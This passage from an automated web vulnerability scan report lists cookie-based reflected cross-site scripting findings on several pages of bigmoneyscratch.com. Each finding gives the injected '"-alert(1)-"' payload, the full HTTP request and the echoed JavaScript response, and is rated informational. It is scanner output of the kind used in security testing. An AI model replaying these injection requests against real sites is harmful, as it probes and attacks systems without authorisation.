            var strRegistrationMode = "PM";
            var strBonusOption = "FM13a03"-alert(1)-"29adba2d383";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.218. http://www.bigmoneyscratch.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8644e"-alert(1)-"45cb3bc9a5e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM8644e"-alert(1)-"45cb3bc9a5e; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8644e"-alert(1)-"45cb3bc9a5e; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8644e"-alert(1)-"45cb3bc9a5e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.219. http://www.bigmoneyscratch.com/Mobile.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Mobile.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df086"-alert(1)-"84606e014ba was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMdf086"-alert(1)-"84606e014ba; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: BO=FMdf086"-alert(1)-"84606e014ba; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:05 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdf086"-alert(1)-"84606e014ba";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.220. http://www.bigmoneyscratch.com/Mobile.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Mobile.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b14d3"-alert(1)-"ef1c5dc00c was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMb14d3"-alert(1)-"ef1c5dc00c; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb14d3"-alert(1)-"ef1c5dc00c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:41 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb14d3"-alert(1)-"ef1c5dc00c";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.221. http://www.bigmoneyscratch.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d53d2"-alert(1)-"a15a5a51b9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMd53d2"-alert(1)-"a15a5a51b9; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: BO=FMd53d2"-alert(1)-"a15a5a51b9; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:50 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd53d2"-alert(1)-"a15a5a51b9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.222. http://www.bigmoneyscratch.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bab6"-alert(1)-"9b62db20f9e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM6bab6"-alert(1)-"9b62db20f9e; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM6bab6"-alert(1)-"9b62db20f9e; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:30 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM6bab6"-alert(1)-"9b62db20f9e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.223. http://www.bigmoneyscratch.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ad17"-alert(1)-"7e10f8c55e5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM3ad17"-alert(1)-"7e10f8c55e5; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: BO=FM3ad17"-alert(1)-"7e10f8c55e5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:24 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3ad17"-alert(1)-"7e10f8c55e5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.224. http://www.bigmoneyscratch.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda30"-alert(1)-"17b8fe426b3 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMeda30"-alert(1)-"17b8fe426b3; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMeda30"-alert(1)-"17b8fe426b3; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMeda30"-alert(1)-"17b8fe426b3";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.225. http://www.bigmoneyscratch.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eebb2"-alert(1)-"fa62934d047 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMeebb2"-alert(1)-"fa62934d047; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: BO=FMeebb2"-alert(1)-"fa62934d047; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:46 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMeebb2"-alert(1)-"fa62934d047";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.226. http://www.bigmoneyscratch.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5946a"-alert(1)-"7675b07c96b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM5946a"-alert(1)-"7675b07c96b; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5946a"-alert(1)-"7675b07c96b; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5946a"-alert(1)-"7675b07c96b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.227. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae4cb"-alert(1)-"dee9fdf9e7a was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMae4cb"-alert(1)-"dee9fdf9e7a; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: BO=FMae4cb"-alert(1)-"dee9fdf9e7a; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:23 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
